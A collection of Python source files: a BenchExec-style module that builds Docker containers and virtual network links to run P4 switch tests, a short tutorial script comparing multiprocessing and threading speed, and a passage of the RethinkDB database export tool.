MGNT_NETWORK_SUBNET = "172.19" # Subnet 192.19.x.x/16
NODE_IMAGE_NAME = "basic_node"
SWITCH_IMAGE_NAME = "switch_bmv2"
PTF_IMAGE_NAME = "ptf_tester"
class P4Execution(object):
"""
This Class is for executing p4 benchmarks. The class creates docker containers representing each
device in the network. It creates virutal ethenet connections between all the devices. Finally,
it sets up a test container connected to all the nodes in the network.
"""
def __init__(self):
self.nodes = None # Set by init
self.switches = None # Set by init
self.ptf_tester = None # Set by init
# Includes all nodes and switches, not the ptf tester
self.nr_of_active_containers = Counter()
self.client = None
self.node_networks = []
self.mgnt_network = None
def init(self, config, benchmark):
"""
This functions will set up the docker network to execute the test.
As a result, it needs root permission for the setup part.
"""
tool_locator = tooladapter.create_tool_locator(config)
benchmark.executable = benchmark.tool.executable(tool_locator)
benchmark.tool_version = benchmark.tool.version(benchmark.executable)
# Read test inputs paths
(
self.switch_source_path,
self.ptf_folder_path,
self.network_config_path,
) = self.read_folder_paths(benchmark)
if not os.path.isdir(self.switch_source_path):
logging.critical(
"Switch folder path not found: %s, {self.switch_source_path}"
)
raise BenchExecException(
"Switch folder path not found. Look over setup definition"
)
if not os.path.isdir(self.ptf_folder_path):
logging.critical(
"Ptf test folder path not found: %s, {self.ptf_folder_path}"
)
raise (
BenchExecException(
f"Ptf test folder path not found: {self.ptf_folder_path}"
)
)
if not self.switch_source_path or not self.ptf_folder_path:
raise BenchExecException(
"Switch or Ptf folder path not defined."
f"Switch path: {self.switch_source_path} Folder path: {self.ptf_folder_path}"
)
# Extract network config info
if not self.network_config_path:
logging.error("No network config file was defined")
raise BenchExecException("No network config file was defined")
with open(self.network_config_path) as json_file:
self.network_config = json.load(json_file)
setup_is_valid = self.network_file_isValid()
if not setup_is_valid:
raise BenchExecException("Network config file is not valid")
# Container setup
self.client = docker.from_env()
self.switch_target_path = "/app"
self.nrOfNodes = len(self.network_config["nodes"])
try:
# Create the ptf tester container
mount_ptf_tester = docker.types.Mount(
"/app", self.ptf_folder_path, type="bind"
)
try:
self.ptf_tester = self.client.containers.create(
PTF_IMAGE_NAME,
detach=True,
name="ptfTester",
mounts=[mount_ptf_tester],
tty=True,
)
except docker.errors.APIError:
self.ptf_tester = self.client.containers.get("ptfTester")
# Create node containers
self.nodes = []
for node_name in self.network_config["nodes"]:
try:
self.nodes.append(
self.client.containers.create(
NODE_IMAGE_NAME, detach=True, name=node_name
)
)
except docker.errors.APIError:
logging.error("Failed to setup node container.")
self.switches = []
# Each switch needs their own mount copy
for switch_info in self.network_config["switches"]:
mount_path = self.create_switch_mount_copy(switch_info)
mount_switch = docker.types.Mount(
self.switch_target_path, mount_path, type="bind"
)
try:
self.switches.append(
self.client.containers.create(
SWITCH_IMAGE_NAME,
detach=True,
name=switch_info,
mounts=[mount_switch],
)
)
except docker.errors.APIError:
self.switches.append(self.client.containers.get(switch_info))
logging.info("Setting up network")
self.setup_network()
self.connect_nodes_to_switch()
except docker.errors.APIError as e:
self.close()
raise BenchExecException(str(e))
def execute_benchmark(self, benchmark, output_handler):
"""
Excecutes the benchmark.
"""
self.start_container_listening()
# Wait until all nodes and switches are setup
while self.nr_of_active_containers.value < len(self.nodes + self.switches):
time.sleep(1)
test_dict = self.read_tests()
setup_handler = P4SetupHandler(benchmark, test_dict)
setup_handler.update_runsets()
# Read all switch setup logs
for switch in self.switches:
switch_log_file = (
f"{self.switch_source_path}/{switch.name}/log/switch_log.txt"
)
switch_command_output = (
f"{self.switch_source_path}/{switch.name}/table_command_output.txt"
)
switch_log_file_new = f"{benchmark.log_folder}{switch.name}_Setup.log"
switch_command_output_new = (
f"{benchmark.log_folder}{switch.name}_table_entry.log"
)
copyfile(switch_log_file, switch_log_file_new)
# Check for table output file
if os.path.exists(switch_command_output):
copyfile(switch_command_output, switch_command_output_new)
else:
logging.info("No tables was loaded for switch: %s, {switch.name}")
# Clear log file
with open(switch_log_file, "r+") as f:
f.truncate()
if output_handler.compress_results:
self.move_file_to_zip(switch_log_file_new, output_handler, benchmark)
if os.path.exists(switch_command_output):
self.move_file_to_zip(
switch_command_output_new, output_handler, benchmark
)
for runSet in benchmark.run_sets:
if STOPPED_BY_INTERRUPT:
break
if not runSet.should_be_executed():
output_handler.output_for_skipping_run_set(runSet)
elif not runSet.runs:
output_handler.output_for_skipping_run_set(
runSet, "because it has no files"
)
output_handler.output_before_run_set(runSet)
for run in runSet.runs:
# Create ptf command depending on nr of nodes
command = f"ptf --test-dir /app {run.identifier}"
for node in self.nodes:
node_config = self.network_config["nodes"][node.name]
command += f" --device-socket {node_config['id']}-{{0-64}}@tcp://{MGNT_NETWORK_SUBNET}.0.{node_config['id'] + 3}:10001"
command += " --platform nn"
return_code, test_output = self._execute_benchmark(run, command)
test_output = test_output.decode("utf-8")
try:
with open(run.log_file, "w") as ouputFile:
for _i in range(6):
ouputFile.write("\n")
# for result in test_results:
ouputFile.write(test_output + "\n")
except OSError:
print("Failed")
values = {}
values["exitcode"] = util.ProcessExitCode.from_raw(return_code)
run._cmdline = command.split(" ")
run.set_result(values)
# Save all switch log_files
for switch in self.switches:
switch_log_file = (
f"{self.switch_source_path}/{switch.name}/log/switch_log.txt"
)
switch_log_file_new = f"{run.log_file[:-4]}_{switch.name}.log"
copyfile(switch_log_file, switch_log_file_new)
# Clear the log file for next test
with open(switch_log_file, "r+") as f:
f.truncate()
if output_handler.compress_results:
self.move_file_to_zip(
switch_log_file_new, output_handler, benchmark
)
print(run.identifier + ": ", end="")
output_handler.output_after_run(run)
output_handler.output_after_benchmark(STOPPED_BY_INTERRUPT)
self.close()
def _execute_benchmark(self, run, command):
return self.ptf_tester.exec_run(command, tty=True)
def setup_network(self):
"""
Creates the managment network, connectes all nodes and the ptf tester
to the network.
"""
try:
ipam_pool = docker.types.IPAMPool(
subnet=MGNT_NETWORK_SUBNET + ".0.0/16", # "172.19.0.0/16",
gateway=MGNT_NETWORK_SUBNET + ".0.1", # "172.19.0.1"
)
ipam_config = docker.types.IPAMConfig(pool_configs=[ipam_pool])
self.mgnt_network = self.client.networks.create(
"mgnt", driver="bridge", ipam=ipam_config
)
except docker.errors.APIError as error:
# Check if error is network overlap
if "overlap" in str(error):
self.mgnt_network = self.client.networks.get("mgnt")
else:
raise error
self.mgnt_network.connect(
self.ptf_tester, ipv4_address=MGNT_NETWORK_SUBNET + ".0.2"
)
for node in self.nodes:
node_config = self.network_config["nodes"][node.name]
ip_addr = f"{MGNT_NETWORK_SUBNET}.0.{node_config['id'] + 3}"
self.mgnt_network.connect(node, ipv4_address=ip_addr)
def connect_nodes_to_switch(self):
"""
This will create veth pairs for all links definid in the network config.
Each veth will also be moved to the correct network namespace.
"""
client_low = docker.APIClient()
self.start_containers()
ip = IPRoute()
# Check if netns folder exists. If not, create one for netns to look intp
if not os.path.exists("/var/run/netns"):
os.mkdir("/var/run/netns")
for link in self.network_config["links"]:
device1 = link["device1"]
device2 = link["device2"]
pid_device1 = client_low.inspect_container(device1)["State"]["Pid"]
pid_device2 = client_low.inspect_container(device2)["State"]["Pid"]
# Interface names. Naming convention will be different dempending on connection type
iface_device1 = ""
iface_device2 = ""
# If connectiong to switch. Make sure it is setup
if link["type"] == "Node_to_Switch":
switch_is_setup = os.path.exists(f"/proc/{pid_device2}/ns/net")
# Wait until switch is setup
max_wait_seconds = 10
seconds_waited = 0
while not switch_is_setup and seconds_waited <= max_wait_seconds:
switch_is_setup = os.path.exists(f"/proc/{pid_device2}/ns/net")
time.sleep(1)
seconds_waited += 1
# Check if namespaces are addad. If not add simlinuk to namespace
if not os.path.islink(f"/var/run/netns/{device1}"):
os.symlink(
f"/proc/{pid_device1}/ns/net",
f"/var/run/netns/{device1}",
)
if not os.path.islink(f"/var/run/netns/{device2}"):
if not os.path.exists(f"/var/run/netns/{device2}"):
os.symlink(
f"/proc/{pid_device2}/ns/net",
f"/var/run/netns/{device2}",
)
iface_device1 = f"{link['device1']}_{link['device1_port']}"
iface_device2 = f"{link['device2']}_{link['device2_port']}"
# Create Veth pair and put them in the right namespace
ip.link("add", ifname=iface_device1, peer=iface_device2, kind="veth")
id_node = ip.link_lookup(ifname=iface_device1)[0]
ip.link("set", index=id_node, state="up")
ip.link("set", index=id_node, net_ns_fd=link["device1"])
id_switch = ip.link_lookup(ifname=iface_device2)[0]
ip.link("set", index=id_switch, state="up")
ip.link("set", index=id_switch, net_ns_fd=link["device2"])
# Start all veth port in Nodes
ns = NetNS(device1)
ns.link("set", index=id_node, state="up")
if "ipv4_addr" in self.network_config["nodes"][device1]:
ns.addr(
"add",
index=id_node,
address=self.network_config["nodes"][device1]["ipv4_addr"],
prefixlen=24,
)
if "ipv6_addr" in link:
continue
if link["type"] == "Switch_to_Switch":
switch_is_setup1 = os.path.exists(f"/proc/{pid_device1}/ns/net")
switch_is_setup2 = os.path.exists(f"/proc/{pid_device2}/ns/net")
max_wait_seconds = 10
seconds_waited = 0
while not switch_is_setup1 and switch_is_setup2:
switch_is_setup1 = os.path.exists(f"/proc/{pid_device1}/ns/net")
switch_is_setup2 = os.path.exists(f"/proc/{pid_device2}/ns/net")
time.sleep(1)
seconds_waited += 1
# Check if namespaces are addad. If not add simlink to namespace
if not os.path.islink(f"/var/run/netns/{device1}"):
os.symlink(
f"/proc/{pid_device1}/ns/net",
f"/var/run/netns/{device1}",
)
if not os.path.islink(f"/var/run/netns/{device2}"):
if not os.path.exists(f"/var/run/netns/{device2}"):
os.symlink(
f"/proc/{pid_device2}/ns/net",
f"/var/run/netns/{device2}",
)
iface_switch1 = f"{link['device1']}_{link['device1_port']}"
iface_switch2 = f"{link['device2']}_{link['device2_port']}"
# Create Veth pair and put them in the right namespace
ip.link("add", ifname=iface_switch1, peer=iface_switch2, kind="veth")
id_switch1 = ip.link_lookup(ifname=iface_switch1)[0]
ip.link("set", index=id_switch1, state="up")
ip.link("set", index=id_switch1, net_ns_fd=link["device1"])
id_switch2 = ip.link_lookup(ifname=iface_switch2)[0]
ip.link("set", index=id_switch2, state="up")
ip.link("set", index=id_switch2, net_ns_fd=link["device2"])
# Start all veth in all the switches
for switch in self.switches:
ns = NetNS(switch.name)
net_interfaces = ns.get_links()
for interface in net_interfaces[2:]:
iface_name = interface["attrs"][0][1]
id_switch = ns.link_lookup(ifname=iface_name)[0]
ns.link("set", index=id_switch, state="up")
def read_tests(self):
"""
Read the test from the ptf container
"""
# Make sure it's started. This is a blocking call
self.ptf_tester.start()
_, test_info = self.ptf_tester.exec_run("ptf --test-dir /app --list")
test_info = test_info.decode()
test_dict = self.extract_info_from_test_info(test_info)
return test_dict
def extract_info_from_test_info(self, test_info):
test_info = test_info.split("Test List:")[1]
test_modules = test_info.split("Module ")
nr_of_modules = len(test_modules) - 1
test_modules[len(test_modules) - 1] = test_modules[len(test_modules) - 1].split(
f"\n{nr_of_modules}"
)[0]
test_dict = {}
for i in range(nr_of_modules):
test = test_modules[i + 1].split("\n")
module_name = test.pop(0).split(":")[0]
test_names = []
for test_string in test:
if not str.isspace(test_string) and test_string:
test_names.append(test_string.split(":")[0].strip())
test_dict[module_name] = test_names
return test_dict
def get_system_info(self):
return systeminfo.SystemInfo()
def read_folder_paths(self, benchmark):
switch_folder = ""
ptf_folder = ""
network_config = ""
option_index = 0
while option_index < len(benchmark.options):
if "switch" in benchmark.options[option_index].lower():
switch_folder = benchmark.options[option_index + 1]
elif "ptf" in benchmark.options[option_index].lower():
ptf_folder = benchmark.options[option_index + 1]
elif "network_config" in benchmark.options[option_index].lower():
network_config = benchmark.options[option_index + 1]
option_index += 2
if "~" in switch_folder:
switch_folder = self.extract_path(switch_folder)
if "~" in ptf_folder:
ptf_folder = self.extract_path(ptf_folder)
if "~" in network_config:
network_config = self.extract_path(network_config)
return switch_folder, ptf_folder, network_config
def extract_path(self, path):
import subprocess
split = subprocess.run(["pwd"], capture_output=True).stdout.decode().split("/")
home_dir = f"/{split[1]}/{split[2]}"
new_path = path.replace("~", home_dir)
return new_path
def stop(self):
"""
Needed for automatic cleanup for benchec.
"""
self.close()
def close(self):
"""
Cleans up all the running containers and clear all created namespaces. Should be called when test is done.
"""
logging.info("Closing containers and cleaning up namespace")
container_threads = []
for container in self.nodes:
container_threads.append(
threading.Thread(
target=lambda x: x.remove(force=True), args=(container,)
)
)
if os.path.islink(f"/var/run/netns/{container.name}"):
os.remove(f"/var/run/netns/{container.name}")
for container in self.switches:
if os.path.isdir(f"{self.switch_source_path}/{container.name}"):
rmtree(f"{self.switch_source_path}/{container.name}")
container_threads.append(
threading.Thread(
target=lambda x: x.remove(force=True), args=(container,)
)
)
if os.path.islink(f"/var/run/netns/{container.name}"):
os.remove(f"/var/run/netns/{container.name}")
if self.ptf_tester:
container_threads.append(
threading.Thread(
target=lambda x: x.remove(force=True), args=(self.ptf_tester,)
)
)
[x.start() for x in container_threads]
[x.join() for x in container_threads]
# Remove when all containers are closed
if self.mgnt_network:
self.mgnt_network.remove()
def thread_remove_container(self, container):
container.remove(force=True)
def start_containers(self):
"""
Start all containers. This is done with thread. This function does not gurantees that
containers are started.
"""
containers_to_start = self.nodes + self.switches
containers_to_start.append(self.ptf_tester)
container_threads = []
for container in containers_to_start:
container_threads.append(
threading.Thread(target=lambda x: x.start(), args=(container,))
)
# Start and wait for all to finish
[x.start() for x in container_threads]
[x.join() for x in container_threads]
def thread_container_start(self, container):
container.start()
def start_container_listening(self):
"""
This will set all the nodes and switches up for testing. This means all nodes runs
the ptf agent script and all switches run the switch starup command. All the ports and their
configuration are set automatically.
"""
container_threads = []
for node_container in self.nodes:
# Read node info
node_config = self.network_config["nodes"][node_container.name]
node_command = (
f"python3 /usr/local/src/ptf/ptf_nn/ptf_nn_agent.py --device-socket "
f"{node_config['id']}@tcp://{MGNT_NETWORK_SUBNET}.0.{node_config['id'] + 3}:10001"
)
used_ports = self.network_config["nodes"][node_container.name]["used_ports"]
for port_nr in used_ports:
node_command += " -i {0}-{1}@{2}_{1}".format(
node_config["id"], port_nr, node_container.name
)
container_threads.append(
threading.Thread(
target=self.thread_setup_node, args=(node_container, node_command)
)
)
for switch in self.switches:
switch_config = self.network_config["switches"][switch.name]
switch_command = "simple_switch --log-file /app/log/switch_log --log-flush"
used_ports = self.network_config["switches"][switch.name]["used_ports"]
for port in used_ports:
switch_command += f" -i {port}@{switch.name}_{port}"
switch_command += f" /app/P4/{switch_config['p4_file_name']}"
container_threads.append(
threading.Thread(
target=self.thread_setup_switch, args=(switch, switch_command)
)
)
# Wait for all to setup befor leaveing the method
[x.start() for x in container_threads]
[x.join() for x in container_threads]
def set_link_state(self, ns, state, iface_ids):
available_states = ["UP", "DOWN"]
if state in available_states:
for iface_id in iface_ids:
ns.link("set", index=iface_id, state=state)
def thread_setup_switch(self, switch_container, switch_command):
"""
Sets up a switch. Ment to be ran in a thread.
"""
ns = NetNS(switch_container.name)
# Check if some interface failed to start
while len(ns.link_lookup(IFLA_OPERSTATE="DOWN")) != 0:
self.set_link_state(ns, "UP", ns.link_lookup(IFLA_OPERSTATE="DOWN"))
time.sleep(1)
switch_container.exec_run(switch_command, detach=True)
switch_is_setup = False
switch_log_file_path = (
f"{self.switch_source_path}/{switch_container.name}/log/switch_log.txt"
)
# This loop will wait until server is started up
while not switch_is_setup:
with open(switch_log_file_path, "r") as f:
info_string = f.read()
switch_is_setup = "Thrift server was started" in info_string
time.sleep(1)
# Load tables
if "table_entries" in self.network_config["switches"][switch_container.name]:
for table_name in self.network_config["switches"][switch_container.name][
"table_entries"
]:
table_file_path = f"{self.switch_source_path}/{switch_container.name}/tables/{table_name}"
if os.path.exists(table_file_path):
switch_container.exec_run(
f"python3 /app/table_handler.py "
f"{self.switch_target_path}/tables/{table_name}",
detach=True,
)
else:
logging.info("Could not find table: \n %s", table_file_path)
self.nr_of_active_containers.increment()
def thread_setup_node(self, node_container, node_command):
node_container.exec_run(node_command, detach=True)
self.nr_of_active_containers.increment()
def create_switch_mount_copy(self, switch_name):
switch_path = f"{self.switch_source_path}/{switch_name}"
os.mkdir(switch_path)
# Copy relevant folders
os.mkdir(switch_path + "/log")
os.mkdir(switch_path + "/P4")
os.mkdir(switch_path + "/tables")
# Create log file for switch to use
open(switch_path + "/log/switch_log.txt", "x")
copy_tree(self.switch_source_path + "/P4", switch_path + "/P4")
copy_tree(self.switch_source_path + "/tables", switch_path + "/tables")
copyfile(
self.switch_source_path + "/table_handler.py",
switch_path + "/table_handler.py",
)
return switch_path
def move_file_to_zip(self, file_path, output_handler, benchmark):
log_file_path = os.path.relpath(
file_path, os.path.join(benchmark.log_folder, os.pardir)
)
output_handler.log_zip.write(file_path, log_file_path)
os.remove(file_path)
def network_file_isValid(self):
"""
Simple chech throught the network file
"""
if not self.network_config:
logging.debug("No network file is defined for validation")
return False
else:
# Check nodes
if "nodes" not in self.network_config:
logging.debug("No nodes defined in network config")
return False
elif len(self.network_config["nodes"]) == 0:
logging.debug("No nodes defined in network config")
return False
# Check for duplicate node names TODO Check duplicate ids
node_names = list(self.network_config["nodes"].keys())
for node_name in node_names:
if node_names.count(node_name) > 1:
logging.debug("Duplicate node name detected")
return False
# Check switches
if "switches" not in self.network_config:
logging.debug("No switches defined")
return False
elif len(self.network_config["switches"]) == 0:
logging.debug("No nodes defined in network config")
return False
switch_names = list(self.network_config["switches"].keys())
for switch_name in switch_names:
if switch_names.count(switch_name) > 1:
logging.debug("Duplicate switch name detected")
return False
# Check links
if "links" in self.network_config:
all_devices = switch_names + node_names
for link in self.network_config["links"]:
if (
not link["device1"] in all_devices
or not link["device2"] in all_devices
):
logging.debug("Link between none defined devices detected")
return False
if (
not type(link["device1_port"]) == int
or not type(link["device2_port"]) == int
):
return False
return True
|
multiprocessing4_efficiency_comparison.py
|
# View more 3_python 1_tensorflow_new tutorial on my Youtube and Youku channel!!!
# Youtube video tutorial: https://www.youtube.com/channel/UCdyjiB5H8Pu7aDTNVXTTpcg
# Youku video tutorial: http://i.youku.com/pythontutorial
import multiprocessing as mp
import threading as td
import time
def job(q):
res = 0
for i in range(1000000):
res += i+i**2+i**3
q.put(res) # queue
def multicore():
q = mp.Queue()
p1 = mp.Process(target=job, args=(q,))
p2 = mp.Process(target=job, args=(q,))
p1.start()
p2.start()
p1.join()
p2.join()
res1 = q.get()
res2 = q.get()
print('multicore:' , res1+res2)
def normal():
res = 0
for _ in range(2):
for i in range(1000000):
res += i+i**2+i**3
print('normal:', res)
def multithread():
q = mp.Queue()
t1 = td.Thread(target=job, args=(q,))
t2 = td.Thread(target=job, args=(q,))
t1.start()
t2.start()
t1.join()
t2.join()
res1 = q.get()
res2 = q.get()
print('multithread:', res1+res2)
if __name__ == '__main__':
st = time.time()
normal()
st1= time.time()
print('normal time:', st1 - st)
multithread()
st2 = time.time()
print('multithread time:', st2 - st1)
multicore()
print('multicore time:', time.time()-st2)
|
_export.py
|
#!/usr/bin/env python
from __future__ import print_function
import collections, csv, ctypes, datetime, json, math, multiprocessing, numbers
import optparse, os, platform, tempfile, re, signal, sys, time, traceback
from . import errors, net, query, utils_common
try:
unicode
except NameError:
unicode = str
try:
from Queue import Empty, Full
except ImportError:
from queue import Empty, Full
try:
from multiprocessing import Queue, SimpleQueue
except ImportError:
from multiprocessing.queues import Queue, SimpleQueue
usage = """rethinkdb export [-c HOST:PORT] [-p] [--password-file FILENAME] [--tls-cert filename] [-d DIR] [-e (DB | DB.TABLE)]...
[--format (csv | json | ndjson)] [--fields FIELD,FIELD...] [--delimiter CHARACTER]
[--clients NUM]"""
help_description = '`rethinkdb export` exports data from a RethinkDB cluster into a directory'
help_epilog = '''
EXAMPLES:
rethinkdb export -c mnemosyne:39500
Export all data from a cluster running on host 'mnemosyne' with a client port at 39500.
rethinkdb export -e test -d rdb_export
Export only the 'test' database on a local cluster into a named directory.
rethinkdb export -c hades -e test.subscribers -p
Export a specific table from a cluster running on host 'hades' which requires a password.
rethinkdb export --format csv -e test.history --fields time,message --delimiter ';'
Export a specific table from a local cluster in CSV format with the fields 'time' and 'message',
using a semicolon as field delimiter (rather than a comma).
rethinkdb export --fields id,value -e test.data
Export a specific table from a local cluster in JSON format with only the fields 'id' and 'value'.
'''
def parse_options(argv, prog=None):
if platform.system() == "Windows" or platform.system().lower().startswith('cygwin'):
defaultDir = "rethinkdb_export_%s" % datetime.datetime.today().strftime("%Y-%m-%dT%H-%M-%S") # no colons in name
else:
defaultDir = "rethinkdb_export_%s" % datetime.datetime.today().strftime("%Y-%m-%dT%H:%M:%S") # "
parser = utils_common.CommonOptionsParser(usage=usage, description=help_description, epilog=help_epilog, prog=prog)
parser.add_option("-d", "--directory", dest="directory", metavar="DIRECTORY", default=defaultDir, help='directory to output to (default: rethinkdb_export_DATE_TIME)', type="new_file")
parser.add_option("-e", "--export", dest="db_tables", metavar="DB|DB.TABLE", default=[], help='limit dump to the given database or table (may be specified multiple times)', action="append", type="db_table")
parser.add_option("--fields", dest="fields", metavar="<FIELD>,...", default=None, help='export only specified fields (required for CSV format)')
parser.add_option("--format", dest="format", metavar="json|csv|ndjson", default="json", help='format to write (defaults to json. ndjson is newline delimited json.)', type="choice", choices=['json', 'csv', 'ndjson'])
parser.add_option("--clients", dest="clients", metavar="NUM", default=3, help='number of tables to export simultaneously (default: 3)', type="pos_int")
parser.add_option("--read-outdated", dest="outdated", default=False, help='use outdated read mode', action="store_true")
csvGroup = optparse.OptionGroup(parser, 'CSV options')
csvGroup.add_option("--delimiter", dest="delimiter", metavar="CHARACTER", default=None, help="character to be used as field delimiter, or '\\t' for tab (default: ',')")
parser.add_option_group(csvGroup)
options, args = parser.parse_args(argv)
# -- Check validity of arguments
if len(args) != 0:
parser.error("No positional arguments supported. Unrecognized option(s): %s" % args)
if options.fields:
if len(options.db_tables) != 1 or options.db_tables[0].table is None:
parser.error("The --fields option can only be used when exporting a single table")
options.fields = options.fields.split(",")
# - format specific validation
if options.format == "csv":
if options.fields is None:
parser.error("CSV files require the '--fields' option to be specified.")
if options.delimiter is None:
options.delimiter = ","
elif options.delimiter == "\\t":
options.delimiter = "\t"
elif len(options.delimiter) != 1:
parser.error("Specify exactly one character for the --delimiter option: %s" % options.delimiter)
else:
if options.delimiter:
parser.error("--delimiter option is only valid for CSV file formats")
# -
return options
def json_writer(filename, fields, task_queue, error_queue, format):
try:
with open(filename, "w") as out:
first = True
if format != "ndjson":
out.write("[")
item = task_queue.get()
while not isinstance(item, StopIteration):
row = item[0]
if fields is not None:
for item in list(row.keys()):
if item not in fields:
del row[item]
if first:
if format == "ndjson":
out.write(json.dumps(row))
else:
out.write("\n" + json.dumps(row))
first = False
elif format == "ndjson":
out.write("\n" + json.dumps(row))
else:
out.write(",\n" + json.dumps(row))
item = task_queue.get()
if format != "ndjson":
out.write("\n]\n")
except:
ex_type, ex_class, tb = sys.exc_info()
error_queue.put((ex_type, ex_class, traceback.extract_tb(tb)))
# Read until the exit task so the readers do not hang on pushing onto the queue
while not isinstance(task_queue.get(), StopIteration):
pass
def csv_writer(filename, fields, delimiter, task_queue, error_queue):
try:
with open(filename, "w") as out:
out_writer = csv.writer(out, delimiter=delimiter)
out_writer.writerow(fields)
item = task_queue.get()
while not isinstance(item, StopIteration):
row = item[0]
info = []
# If the data is a simple type, just write it directly, otherwise, write it as json
for field in fields:
if field not in row:
info.append(None)
elif isinstance(row[field], numbers.Number):
info.append(str(row[field]))
elif isinstance(row[field], str):
info.append(row[field])
elif isinstance(row[field], unicode):
info.append(row[field].encode('utf-8'))
else:
if str == unicode:
info.append(json.dumps(row[field]))
else:
info.append(json.dumps(row[field]).encode('utf-8'))
out_writer.writerow(info)
item = task_queue.get()
except:
ex_type, ex_class, tb = sys.exc_info()
error_queue.put((ex_type, ex_class, traceback.extract_tb(tb)))
# Read until the exit task so the readers do not hang on pushing onto the queue
while not isinstance(task_queue.get(), StopIteration):
pass
def export_table(db, table, directory, options, error_queue, progress_info, sindex_counter, hook_counter, exit_event):
signal.signal(signal.SIGINT, signal.SIG_DFL) # prevent signal handlers from being set in child processes
writer = None
try:
# -- get table info
table_info = options.retryQuery('table info: %s.%s' % (db, table), query.db(db).table(table).info())
# Rather than just the index names, store all index information
table_info['indexes'] = options.retryQuery(
'table index data %s.%s' % (db, table),
query.db(db).table(table).index_status(),
runOptions={'binary_format':'raw'}
)
sindex_counter.value += len(table_info["indexes"])
table_info['write_hook'] = options.retryQuery(
'table write hook data %s.%s' % (db, table),
query.db(db).table(table).get_write_hook(),
runOptions={'binary_format':'raw'})
if table_info['write_hook'] != None:
hook_counter.value += 1
with open(os.path.join(directory, db, table + '.info'), 'w') as info_file:
info_file.write(json.dumps(table_info) + "\n")
with sindex_counter.get_lock():
sindex_counter.value += len(table_info["indexes"])
# -- start the writer
task_queue = SimpleQueue()
writer = None
if options.format == "json":
filename = directory + "/%s/%s.json" % (db, table)
writer = multiprocessing.Process(target=json_writer, args=(filename, options.fields, task_queue, error_queue, options.format))
elif options.format == "csv":
filename = directory + "/%s/%s.csv" % (db, table)
writer = multiprocessing.Process(target=csv_writer, args=(filename, options.fields, options.delimiter, task_queue, error_queue))
elif options.format == "ndjson":
filename = directory + "/%s/%s.ndjson" % (db, table)
writer = multiprocessing.Process(target=json_writer, args=(filename, options.fields, task_queue, error_queue, options.format))
else:
raise RuntimeError("unknown format type: %s" % options.format)
writer.start()
# -- read in the data source
# -
lastPrimaryKey = None
read_rows = 0
runOptions = {
"time_format":"raw",
"binary_format":"raw"
}
if options.outdated:
runOptions["read_mode"] = "outdated"
cursor = options.retryQuery(
'inital cursor for %s.%s' % (db, table),
query.db(db).table(table).order_by(index=table_info["primary_key"]),
runOptions=runOptions
)
while not exit_event.is_set():
try:
for row in cursor:
# bail on exit
if exit_event.is_set():
break
# add to the output queue
task_queue.put([row])
lastPrimaryKey = row[table_info["primary_key"]]
read_rows += 1
# Update the progress every 20 rows
if read_rows % 20 == 0:
progress_info[0].value = read_rows
else:
# Export is done - since we used estimates earlier, update the actual table size
progress_info[0].value = read_rows
progress_info[1].value = read_rows
break
except (errors.ReqlTimeoutError, errors.ReqlDriverError) as e:
# connection problem, re-setup the cursor
try:
cursor.close()
except Exception: pass
cursor = options.retryQuery(
'backup cursor for %s.%s' % (db, table),
query.db(db).table(table).between(lastPrimaryKey, None, left_bound="open").order_by(index=table_info["primary_key"]),
runOptions=runOptions
)
except (errors.ReqlError, errors.ReqlDriverError) as ex:
error_queue.put((RuntimeError, RuntimeError(ex.message), traceback.extract_tb(sys.exc_info()[2])))
except:
ex_type, ex_class, tb = sys.exc_info()
error_queue.put((ex_type, ex_class, traceback.extract_tb(tb)))
finally:
if writer and writer.is_alive():
task_queue.put(StopIteration())
writer.join()
def abort_export(signum, frame, exit_event, interrupt_event):
interrupt_event.set()
exit_event.set()
# We sum up the row count from all tables for total percentage completion
# This is because table exports can be staggered when there are not enough clients
# to export all of them at once. As a result, the progress bar will not necessarily
# move at the same rate for different tables.
def update_progress(progress_info, options):
rows_done = 0
total_rows = 1
for current, max_count in progress_info:
curr_val = current.value
max_val = max_count.value
if curr_val < 0:
# There is a table that hasn't finished counting yet, we can't report progress
rows_done = 0
break
else:
rows_done += curr_val
total_rows += max_val
if not options.quiet:
utils_common.print_progress(float(rows_done) / total_rows, indent=4)
def run_clients(options, workingDir, db_table_set):
# Spawn one client for each db.table, up to options.clients at a time
exit_event = multiprocessing.Event()
processes = []
error_queue = SimpleQueue()
interrupt_event = multiprocessing.Event()
sindex_counter = multiprocessing.Value(ctypes.c_longlong, 0)
hook_counter = multiprocessing.Value(ctypes.c_longlong, 0)
signal.signal(signal.SIGINT, lambda a, b: abort_export(a, b, exit_event, interrupt_event))
errors = []
try:
progress_info = []
arg_lists = []
for db, table in db_table_set:
tableSize = int(options.retryQuery("count", query.db(db).table(table).info()['doc_count_estimates'].sum()))
progress_info.append((multiprocessing.Value(ctypes.c_longlong, 0),
multiprocessing.Value(ctypes.c_longlong, tableSize)))
arg_lists.append((db, table,
workingDir,
options,
error_queue,
progress_info[-1],
sindex_counter,
hook_counter,
exit_event,
))
# Wait for all tables to finish
while processes or arg_lists:
time.sleep(0.1)
while not error_queue.empty():
exit_event.set() # Stop immediately if an error occurs
errors.append(error_queue.get())
processes = [process for process in processes if process.is_alive()]
if len(processes) < options.clients and len(arg_lists) > 0:
newProcess = multiprocessing.Process(target=export_table, args=arg_lists.pop(0))
newProcess.start()
processes.append(newProcess)
update_progress(progress_info, options)
# If we were successful, make sure 100% progress is reported
# (rows could have been deleted which would result in being done at less than 100%)
if len(errors) == 0 and not interrupt_event.is_set() and not options.quiet:
utils_common.print_progress(1.0, indent=4)
# Continue past the progress output line and print total rows processed
def plural(num, text, plural_text):
return "%d %s" % (num, text if num == 1 else plural_text)
if not options.quiet:
print("\n %s exported from %s, with %s, and %s" %
(plural(sum([max(0, info[0].value) for info in progress_info]), "row", "rows"),
plural(len(db_table_set), "table", "tables"),
plural(sindex_counter.value, "secondary index", "secondary indexes"),
plural(hook_counter.value, "hook function", "hook functions")
))
finally:
signal.signal(signal.SIGINT, signal.SIG_DFL)
if interrupt_event.is_set():
raise RuntimeError("Interrupted")
if len(errors) != 0:
# multiprocessing queues don't handle tracebacks, so they've already been stringified in the queue
for error in errors:
print("%s" % error[1], file=sys.stderr)
if options.debug:
print("%s traceback: %s" % (error[0].__name__, error[2]), file=sys.stderr)
raise RuntimeError("Errors occurred during export")
def run(options):
# Make sure this isn't a pre-`reql_admin` cluster - which could result in data loss
# if the user has a database named 'rethinkdb'
utils_common.check_minimum_version(options, '1.6')
# get the complete list of tables
db_table_set = set()
allTables = [utils_common.DbTable(x['db'], x['name']) for x in options.retryQuery('list tables', query.db('rethinkdb').table('table_config').pluck(['db', 'name']))]
if not options.db_tables:
db_table_set = allTables # default to all tables
else:
